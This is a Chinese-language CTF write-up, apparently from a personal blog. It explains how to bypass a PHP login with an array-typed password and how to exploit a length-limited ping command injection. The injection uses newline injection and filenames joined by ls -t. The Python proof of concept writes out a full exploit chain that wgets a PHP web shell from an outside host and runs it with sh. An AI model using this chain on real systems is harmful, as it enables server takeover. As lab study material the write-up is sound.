<!doctype html>



  


<html class="theme-next mist use-motion" lang="zh-Hans">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>



<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />




  
  
  
  

  
    
    
  

  
    
      
    

    
  

  

  
    
      
    

    
  

  
    
      
    

    
  

  
    
    
    <link href="//fonts.googleapis.com/css?family=Monda:300,300italic,400,400italic,700,700italic|Roboto Slab:300,300italic,400,400italic,700,700italic|PT Mono:300,300italic,400,400italic,700,700italic|PT Mono:300,300italic,400,400italic,700,700italic&subset=latin,latin-ext" rel="stylesheet" type="text/css">
  






<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.1.0" rel="stylesheet" type="text/css" />


  <meta name="keywords" content="命令执行,Linux," />








  <link rel="shortcut icon" type="image/x-icon" href="/favicon.ico?v=5.1.0" />






<meta name="description" content="参考文章： http://isron.dropsec.xyz/2017/04/10/shell-7/http://www.moonsos.com/post/256.htmlhttp://wonderkun.cc/index.html/?p=524  原理解析从wonderkun师傅的github上d下原码，在本地实现下。不多说，直接上原码">
<meta name="keywords" content="命令执行,Linux">
<meta property="og:type" content="article">
<meta property="og:title" content="绕过7个字符getshell">
<meta property="og:url" content="http://whc.dropsec.xyz/2017/05/08/绕过7个字符getshell/index.html">
<meta property="og:site_name" content="Ha1g0的窝">
<meta property="og:description" content="参考文章： http://isron.dropsec.xyz/2017/04/10/shell-7/http://www.moonsos.com/post/256.htmlhttp://wonderkun.cc/index.html/?p=524  原理解析从wonderkun师傅的github上d下原码，在本地实现下。不多说，直接上原码">
<meta property="og:locale" content="zh-Hans">
<meta property="og:updated_time" content="2017-12-12T10:02:03.646Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="绕过7个字符getshell">
<meta name="twitter:description" content="参考文章： http://isron.dropsec.xyz/2017/04/10/shell-7/http://www.moonsos.com/post/256.htmlhttp://wonderkun.cc/index.html/?p=524  原理解析从wonderkun师傅的github上d下原码，在本地实现下。不多说，直接上原码">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Mist',
    sidebar: {"position":"left","display":"post","offset":12,"offset_float":0,"b2t":false,"scrollpercent":false},
    fancybox: true,
    motion: true,
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://whc.dropsec.xyz/2017/05/08/绕过7个字符getshell/"/>





  <title> 绕过7个字符getshell | Ha1g0的窝 </title>
</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  














  
  
    
  

  <div class="container sidebar-position-left page-post-detail ">
    <div class="headband"></div>
    <a href="https://github.com/whcjst"><img style="position: absolute; top: 0; right: 0; border: 0;" src="https://camo.githubusercontent.com/a6677b08c955af8400f44c6298f40e7d19cc5b2d/68747470733a2f2f73332e616d617a6f6e6177732e636f6d2f6769746875622f726962626f6e732f666f726b6d655f72696768745f677261795f3664366436642e706e67" alt="Fork me on GitHub" data-canonical-src="https://s3.amazonaws.com/github/ribbons/forkme_right_gray_6d6d6d.png"></a>
    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/"  class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Ha1g0的窝</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle"></p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br />
            
            分类
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br />
            
            关于
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />
            
            归档
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br />
            
            标签
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal " itemscope itemtype="http://schema.org/Article">
    <link itemprop="mainEntityOfPage" href="http://whc.dropsec.xyz/2017/05/08/绕过7个字符getshell/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="Ha1g0">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="http://i2.muimg.com/567571/93e407bf4ec3ebb7.jpg">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Ha1g0的窝">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">
            
            
              
                绕过7个字符getshell
              
            
          </h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2017-05-08T21:37:31+08:00">
                2017-05-08
              </time>
            

            

            
          </span>

          
            <span class="post-category" >
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">分类于</span>
              
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/漏洞/" itemprop="url" rel="index">
                    <span itemprop="name">漏洞</span>
                  </a>
                </span>

                
                
                  ， 
                
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/漏洞/CTF/" itemprop="url" rel="index">
                    <span itemprop="name">CTF</span>
                  </a>
                </span>

                
                
              
            </span>
          

          
            
          

          
          

          

          

          

        </div>
      </header>
    


    <div class="post-body" itemprop="articleBody">

      
      

      
        <h3 id="参考文章："><a href="#参考文章：" class="headerlink" title="参考文章："></a>参考文章：</h3><blockquote>
<p><a href="http://isron.dropsec.xyz/2017/04/10/shell-7/" target="_blank" rel="external">http://isron.dropsec.xyz/2017/04/10/shell-7/</a><br><a href="http://www.moonsos.com/post/256.html" target="_blank" rel="external">http://www.moonsos.com/post/256.html</a><br><a href="http://wonderkun.cc/index.html/?p=524" target="_blank" rel="external">http://wonderkun.cc/index.html/?p=524</a></p>
</blockquote>
<h3 id="原理解析"><a href="#原理解析" class="headerlink" title="原理解析"></a>原理解析</h3><p>从wonderkun师傅的<a href="https://github.com/clearloveQAQ/CTF_web/tree/master/web200-3" title="github" target="_blank" rel="external">github</a><br>上d下原码，在本地实现下。不多说，直接上原码<br><a id="more"></a></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div></pre></td><td class="code"><pre><div class="line">$_POST = dAddslashes($_POST);</div><div class="line">$_GET = dAddslashes($_GET);</div><div class="line">$username = <span class="keyword">isset</span>($_POST[<span class="string">'username'</span>]) ? $_POST[<span class="string">'username'</span>] : <span class="keyword">die</span>();</div><div class="line">$password = <span class="keyword">isset</span>($_POST[<span class="string">'password'</span>]) ? md5($_POST[<span class="string">'password'</span>]) : <span class="keyword">die</span>();</div><div class="line">$sql = <span class="string">"select password from users  where username='$username'"</span>;</div><div class="line">$result = $conn-&gt;query($sql);</div><div class="line"><span class="keyword">if</span> (!$result) &#123;</div><div class="line">    <span class="keyword">die</span>(<span class="string">'&lt;script&gt;alert("用户名或密码错误!!")&lt;/script&gt;'</span>);</div><div class="line">&#125;</div><div class="line"></div><div class="line">$row = $result-&gt;fetch_assoc();</div><div class="line"></div><div class="line"><span class="keyword">if</span> ($row[<span class="number">0</span>] === $password) &#123;</div><div class="line">    $_SESSION[<span class="string">'username'</span>] = $username;</div><div class="line">    $_SESSION[<span class="string">'status'</span>] = <span class="number">1</span>;</div><div class="line">    header(<span class="string">"Location:./ping.php"</span>);</div><div class="line"></div><div class="line">&#125; <span class="keyword">else</span> &#123;</div><div class="line"></div><div class="line">    <span class="keyword">die</span>(<span class="string">"&lt;script&gt;alert('用户名或密码错误!!')&lt;/script&gt;"</span>);</div><div class="line">&#125;</div></pre></td></tr></table></figure>
<p>这里的post上去的数据进行全局过滤，不考虑注入，这个里面有一个绕过点，首先看到password在跟数据库的数据进行比对的时候是经过md5哈希过的，所以可以通过和md5(数组)=空来绕过$row[0]===$password。这里涉及一个绕过php强等于的过程，php的===不仅比较值，还比较类型。<a href="http://static.hx99.net/static/drops/tips-7679.html（php比较操作符的安全问题）" target="_blank" rel="external">http://static.hx99.net/static/drops/tips-7679.html（php比较操作符的安全问题）</a><br>现在如果我们输入一个空的username的话，row肯定为空，让passwordpost上去的时候为数组，这样就构成null=o开头的字符串，成功绕过$row[0] === $password</p>
<blockquote>
<p>playload：username=a&amp;&amp;password[]=a</p>
</blockquote>
<p>进入ping.php，有一个一看就像命令执行的ping命令的执行框。<br>查看原码<br><figure class="highlight php"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div><div class="line">24</div><div class="line">25</div><div class="line">26</div><div class="line">27</div><div class="line">28</div><div class="line">29</div><div class="line">30</div><div class="line">31</div><div class="line">32</div><div class="line">33</div><div class="line">34</div><div class="line">35</div><div class="line">36</div><div class="line">37</div><div class="line">38</div><div class="line">39</div><div class="line">40</div><div class="line">41</div><div class="line">42</div></pre></td><td class="code"><pre><div class="line">$ip=<span class="keyword">isset</span>($_POST[<span class="string">'ip'</span>])?$_POST[<span class="string">'ip'</span>]:<span class="keyword">die</span>();</div><div class="line">    <span class="comment">// $ip =isset($_GET['ip'])?$_GET['ip']:die();</span></div><div class="line">    <span class="keyword">if</span>(!preg_match(<span class="string">"/^\d&#123;1,3&#125;\.\d&#123;1,3&#125;\.\d&#123;1,3&#125;\.\d&#123;1,3&#125;/i"</span>,$ip))&#123;</div><div class="line">          <span class="keyword">die</span>(<span class="string">"&lt;pre&gt;ip 格式错误!!&lt;/pre&gt;"</span>);</div><div class="line">    &#125;</div><div class="line">    $substitutions = <span class="keyword">array</span>(</div><div class="line">        <span class="string">'&amp;'</span>  =&gt; <span class="string">''</span>,</div><div class="line">        <span class="string">';'</span> =&gt; <span class="string">''</span>,</div><div class="line">        <span class="string">'$'</span>  =&gt; <span class="string">''</span>,</div><div class="line">        <span class="string">'('</span>  =&gt; <span class="string">''</span>,</div><div class="line">        <span class="string">')'</span>  =&gt; <span class="string">''</span>,</div><div class="line">        <span class="string">'`'</span>  =&gt; <span class="string">''</span>,</div><div class="line">        <span class="string">'|'</span> =&gt; <span class="string">''</span>,</div><div class="line">     );</div><div class="line">   $ip = str_replace( array_keys( $substitutions ), $substitutions, $ip );</div><div class="line">  <span class="comment">//  echo strlen($ip)."&lt;/br&gt;";</span></div><div class="line">  <span class="comment">//  echo $ip;</span></div><div class="line">   <span class="keyword">if</span>(strlen($ip)&lt;<span class="number">7</span>||strlen($ip)&gt;<span class="number">15</span>)&#123;</div><div class="line">       <span class="keyword">die</span>(<span class="string">"&lt;pre&gt;ip 长度错误!&lt;/pre&gt;"</span>);</div><div class="line">   &#125;</div><div class="line">    $dir = <span class="string">'sandBox/'</span>.$_SERVER[<span class="string">'REMOTE_ADDR'</span>];</div><div class="line">    <span class="keyword">if</span>(!file_exists($dir)) mkdir($dir);</div><div class="line">    chdir($dir);</div><div class="line"></div><div class="line">    $comments = <span class="string">&lt;&lt;&lt;INFO</span></div><div class="line"><span class="string">   &lt;!--</span></div><div class="line"><span class="string">      \$dir = 'sandBox/'.\$_SERVER['REMOTE_ADDR'];</span></div><div class="line"><span class="string">    if(!file_exists(\$dir)) mkdir(\$dir);</span></div><div class="line"><span class="string">    chdir(\$dir); </span></div><div class="line"><span class="string">   --&gt;</span></div><div class="line"><span class="string">INFO;</span></div><div class="line">    <span class="keyword">echo</span> $comments;</div><div class="line"></div><div class="line">    <span class="keyword">if</span>( stristr( php_uname( <span class="string">'s'</span> ), <span class="string">'Windows NT'</span> ) ) &#123;</div><div class="line">            <span class="comment">// Windows</span></div><div class="line">            $cmd = shell_exec( <span class="string">'ping  '</span> . $ip );</div><div class="line">    &#125;<span class="keyword">else</span>&#123;</div><div class="line">            <span class="comment">// *nix</span></div><div class="line">            $cmd = shell_exec( <span class="string">'ping  -c 1 '</span> . $ip );</div><div class="line">    &#125;</div><div class="line">        <span class="comment">// Feedback for the end user</span></div><div class="line">        <span class="keyword">echo</span>  <span class="string">"&lt;pre&gt;$cmd&lt;/pre&gt;"</span>;</div></pre></td></tr></table></figure></p>
<p>过滤了一些命令执行的一些关键词 &amp;;$()`| ，全部替换为空了。然后输入的内容长度必须在7到15之间（IP长度限制）<br>最上面参考文章的大佬说没有过滤换行符%0a，换行符过滤正则表达式的匹配和字符长度匹配。也就是通过ping 0.0.0.0  加上%0a(shell命令)来绕过不能用linux的连接词的过滤。<br>可以通过wget 命令 远程下载一个shell，但是由于字符限制，所以需要用到/来连接2行命令的字符。  </p>
<h3 id="利用方式"><a href="#利用方式" class="headerlink" title="利用方式"></a>利用方式</h3><p>上poc  </p>
<pre><code class="python"><span class="comment">#!/usr/bin/python</span>
<span class="comment"># -*- coding: utf-8 -*-</span>
<span class="keyword">import</span> requests
<span class="function"><span class="keyword">def</span> <span class="title">GetShell</span><span class="params">()</span>:</span>
    s=requests.session()
    url = <span class="string">"http://192.168.60.128/CTF/wonderkun/CTF_web/web200-3/src/ping.php"</span>
    url1 = <span class="string">"http://192.168.60.128/web200-3/src/"</span>
    header = {
        <span class="string">"Content-Type"</span>:<span class="string">"application/x-www-form-urlencoded"</span>
    }
    data1={<span class="string">'username'</span>:<span class="string">'a'</span>,<span class="string">'password[]'</span>:<span class="string">'a'</span>}
    s.post(url1,data=data1,headers=header)
    <span class="string">'''</span>
<span class="string">    wget\\</span>
<span class="string">    \ 19\\</span>
<span class="string">    2.\\</span>
<span class="string">    16\\</span>
<span class="string">    8.\\</span>
<span class="string">    60.\\</span>
<span class="string">    12\\</span>
<span class="string">    8\ \\</span>
<span class="string">    1.php\ \\</span>
<span class="string">    -O\ \\</span>
<span class="string">    2.php</span>
<span class="string">    '''</span>
    fileNames = [<span class="string">"2.php"</span>, <span class="string">"-O\ \\\\"</span>, <span class="string">"1.php\ \\"</span>,<span class="string">"8\ \\\\"</span>, <span class="string">"12\\\\"</span>, <span class="string">"60.\\\\"</span>, <span class="string">"8.\\\\"</span>, <span class="string">"16\\\\"</span>,<span class="string">"2.\\\\"</span>, <span class="string">"\ 19\\\\"</span>, <span class="string">"wget\\\\"</span>]
   <span class="comment"># 多出的\只是为了充填，无论几个\都是一样的作用</span>
    ip = <span class="string">"0.0.0.1%0a"</span>
    <span class="keyword">for</span> fileName <span class="keyword">in</span> fileNames:
        createFileIp = ip + <span class="string">"&gt;"</span> + fileName
        <span class="keyword">print</span> createFileIp
        data = <span class="string">"ip="</span> + createFileIp
        s.post(url, data=data,headers=header,)
    getShIp = ip + <span class="string">"ls%20-t&gt;1"</span>  <span class="comment">#新生成的文件输入进1中</span>
    <span class="keyword">print</span> getShIp
    data = <span class="string">"ip="</span> + getShIp
    s.post(url, data=data,headers=header)
    getShellIp = ip + <span class="string">"sh%201"</span> <span class="comment"># 执行1这个脚本</span>
    <span class="keyword">print</span> getShellIp
    data = <span class="string">"ip="</span> + getShellIp
    s.post(url, data=data,headers=header)
<span class="keyword">if</span> __name__ == <span class="string">"__main__"</span>:
    GetShell()
</code></pre>
<p>为了wget，先是把他们生成很多个临时文件，然后ls -t&gt;1，然后再sh一下就执行了。我在测试的时候wget了自己的虚拟机，然后生成的文件里面是sever 500 的提示，想了半天自己的虚拟机又不在网络上，怎么可能wget到，真的是石乐志，哈哈。</p>

      
    </div>

    <div>
      
        

      
    </div>

    <div>
      
        

      
    </div>

    <div>
      
        

      
    </div>

	<div>
  
    
<div style="text-align:center;color: #ccc;font-size:14px;">
------ 本文结束 ------</div>
<br/>
<div style="border: 1px solid black">
<div style="margin-left:10px">
<span style="font-weight:blod">版权声明</span>
<img src="http://7xqmjb.com1.z0.glb.clouddn.com/2017020242973cc.png" >
<br/>
<p style="font-size: 10px;line-height: 30px"><a href="http://whc.dropsec.xyz" style="color:#258FC6">Haigo的窝</a> by <a href="http://whc.dropsec.xyz" style="color:#258FC6">Haigo</a> is licensed under a <a href="https://creativecommons.org/licenses/by-nc-nd/4.0/" style="color:#258FC6">Creative Commons BY-NC-ND 4.0 International License</a>.<br/>
由<a href="http://whc.dropsec.xyz" style="color:#258FC6">Haigo</a>创作并维护的<a href="http://whc.dropsec.xyz" style="color:#258FC6">Haigo的窝</a>博客采用<a href="https://creativecommons.org/licenses/by-nc-nd/4.0/" style="color:#258FC6">创作共用保留署名-非商业-禁止演绎4.0国际许可证</a>。<br/>
本文首发于<a href="http://whc.dropsec.xyz" style="color:#258FC6">Haigo的窝</a> 博客（ <a href="http://whc.dropsec.xyz" style="color:#258FC6">http://whc.dropsec.xyz</a> ），版权所有，侵权必究。</p>
</div>
</div>

  
</div>
	
	
    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/命令执行/" rel="tag"><i class="fa fa-tag"></i> 命令执行</a>
          
            <a href="/tags/Linux/" rel="tag"><i class="fa fa-tag"></i> Linux</a>
          
        </div>
      

      
        
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2017/04/20/实验吧决斗场Writeup/" rel="next" title="实验吧决斗场Writeup">
                <i class="fa fa-chevron-left"></i> 实验吧决斗场Writeup
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2017/05/10/CTF中Openssl常用命令/" rel="prev" title="CTF中Openssl常用命令">
                CTF中Openssl常用命令 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          
  <div class="comments" id="comments">
    
  </div>


        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap" >
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
          <img class="site-author-image" itemprop="image"
               src="http://i2.muimg.com/567571/93e407bf4ec3ebb7.jpg"
               alt="Ha1g0" />
          <p class="site-author-name" itemprop="name">Ha1g0</p>
           
              <p class="site-description motion-element" itemprop="description">最近博客重新搭建了，顺便清空了一些以前看起来有些zz的文章</p>
          
        </div>
        <nav class="site-state motion-element">

          
            <div class="site-state-item site-state-posts">
              <a href="/archives">
                <span class="site-state-item-count">16</span>
                <span class="site-state-item-name">日志</span>
              </a>
            </div>
          

          
            
            
            <div class="site-state-item site-state-categories">
              <a href="/categories/index.html">
                <span class="site-state-item-count">5</span>
                <span class="site-state-item-name">分类</span>
              </a>
            </div>
          

          
            
            
            <div class="site-state-item site-state-tags">
              <a href="/tags/index.html">
                <span class="site-state-item-count">11</span>
                <span class="site-state-item-name">标签</span>
              </a>
            </div>
          

        </nav>

        

        <div class="links-of-author motion-element">
          
            
              <span class="links-of-author-item">
                <a href="https://github.com/whcjst" target="_blank" title="Github">
                  
                    <i class="fa fa-fw fa-globe"></i>
                  
                  Github
                </a>
              </span>
            
          
        </div>

        
        

        
        
          <div class="links-of-blogroll motion-element links-of-blogroll-inline">
            <div class="links-of-blogroll-title">
              <i class="fa  fa-fw fa-globe"></i>
              Links
            </div>
            <ul class="links-of-blogroll-list">
              
                <li class="links-of-blogroll-item">
                  <a href="http://isron.cn" title="Isron" target="_blank">Isron</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="http://xq.dropsec.xyz/" title="Mr_white" target="_blank">Mr_white</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="http://yaocl.cn/" title="Mr_Yao" target="_blank">Mr_Yao</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="https://w3dr.github.io/" title="w3dr" target="_blank">w3dr</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="http://www.minitry.cn/" title="minitry" target="_blank">minitry</a>
                </li>
              
            </ul>
          </div>
        

        


      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-3"><a class="nav-link" href="#参考文章："><span class="nav-number">1.</span> <span class="nav-text">参考文章：</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#原理解析"><span class="nav-number">2.</span> <span class="nav-text">原理解析</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#利用方式"><span class="nav-number">3.</span> <span class="nav-text">利用方式</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <script async src="https://dn-lbstatics.qbox.me/busuanzi/2.3/busuanzi.pure.mini.js"></script>
<div class="copyright" >
  
  &copy; 
  <span itemprop="copyrightYear">2017</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Ha1g0</span>
</div>
<div class="powered-by">
<i class="fa fa-user-md"></i><span id="busuanzi_container_site_pv">
    本站总访问量<span id="busuanzi_value_site_pv"></span>次
</span>
</div>



<div class="powered-by">
  由 <a class="theme-link" href="https://hexo.io">Hexo</a> 强力驱动
</div>


<div class="theme-info">
  主题 -
  <a class="theme-link" href="https://github.com/iissnan/hexo-theme-next">
    NexT.Mist
  </a>
</div>





        

        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  


  







  
  <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>

  
  <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>

  
  <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>

  
  <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>

  
  <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>

  
  <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>

  
  <script type="text/javascript" src="/lib/canvas-nest/canvas-nest.min.js"></script>


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.0"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.0"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.0"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.0"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.0"></script>



  


  




	





  





  





  






  





  

  

  

  

  



</body>
</html>
